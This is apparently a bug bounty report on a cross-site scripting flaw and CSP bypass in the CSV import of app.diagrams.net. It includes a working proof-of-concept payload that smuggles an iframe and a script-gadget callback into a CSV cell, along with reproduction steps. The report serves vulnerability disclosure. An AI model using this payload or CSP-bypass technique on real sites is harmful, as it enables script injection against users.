Cross-site Scripting and CSP Bypass in app.diagrams.net

Date: May 04, 2023, 06:10
Reporter: nhienit2010
Source: www.huntr.dev
Report ID: 9BBCC127-1E69-4C88-B318-D2AFEF48EFF0
Tags: csv import, input sanitization, cross-site scripting, csp bypass, vulnerabilities, proof of concept, bug bounty

EPSS: 0.001 (percentile 32.5%)

Description

The application allows the user to import a CSV template into the schema, but it does not sanitize the values in the columns, so any JavaScript contained in a cell is executed.

Proof of Concept

##
## Example CSV import. Use ## for comments and # for configuration. Paste CSV below.
## The following names are reserved and should not be used (or ignored):
## id, tooltip, placeholder(s), link and label (see below)
##
# connect: {"from": "manager", "to": "name", "invert": true, "label": "manages", \
#          "style": "curved=1;endArrow=blockThin;endFill=1;fontSize=11;"}
# connect: {"from": "refs", "to": "id", "style": "curved=1;fontSize=11;"}
# layout: auto
#
## ---- CSV below this line. First line are column names. ----
name,position,id,location,manager,email,fill,stroke,refs,url,image
Tessa Miller'"><iframe srcdoc='<script src=https://apis.google.com/js/api.js?onload=DrawGapiClientCallbackxyz"-alert(document.domain)-"></script>'>,CFO,emi,Office 1,,[email protected],default,#6c8ebf,,https://www.draw.io,https://cdn3.iconfinder.com/data/icons/user-avatars-1/512/users-3-128.png

Steps to reproduce

Click the Insert button -> Advanced -> CSV -> paste the payload above -> the XSS triggers.

Evidence

PoC (attachment not included in this extraction)
